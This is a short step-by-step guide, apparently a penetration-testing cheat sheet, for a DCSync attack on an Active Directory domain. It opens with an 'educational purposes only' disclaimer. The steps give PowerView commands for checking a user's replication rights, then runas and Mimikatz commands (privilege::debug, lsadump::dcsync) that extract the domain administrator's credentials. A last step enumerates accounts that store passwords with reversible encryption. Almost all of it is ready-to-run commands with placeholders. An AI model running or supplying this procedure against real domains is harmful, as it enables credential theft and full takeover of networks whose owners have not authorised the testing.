Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity

Step 1. Define User’s SID and Check Replication Rights

1. Import the PowerView module:
   

   Import-Module PowerView
   

2. View the group membership of a user (e.g., adunn):
   

   Get-DomainUser -Identity [USERNAME] | select samaccountname, objectsid, memberof, useraccountcontrol | fl
   

3. Define the user’s SID (Security Identifier). Replace the placeholder with the actual SID of the user you are investigating:
   

   $sid = "S-1-5-21-1234567890-9876543210-4567891230-5678"
   

4. Check if the user has replication rights for the specified domain:
   

   Get-ObjectAcl -Identity "DC=EXAMPLE,DC=LOCAL" -ResolveGUIDs |
       Where-Object { ($_.ObjectAceType -match 'Replication-Get') } |
       Where-Object { $_.SecurityIdentifier -match $sid } |
       Select-Object AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl
   

Step 2. Performing the DCSync Attack

1. Open a PowerShell session as the user with DCSync privileges:
   

   runas /netonly /user:EXAMPLE\[USERNAME] powershell
   

2. Run Mimikatz:
   

   .\mimikatz.exe
   

3. Enable debug privileges:
   

   mimikatz # privilege::debug
   

4. Execute DCSync:
   

   mimikatz # lsadump::dcsync /domain:EXAMPLE.LOCAL /user:EXAMPLE\administrator
   

Step 3. Additional Enumeration

1. Check if any user accounts have the reversible encryption option enabled:
   

   Get-DomainUser -Identity * | 
       ? { $_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*' } | 
       select samaccountname, useraccountcontrol
   

2. Enumerate accounts with reversible encryption using Get-ADUser:
   

   Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl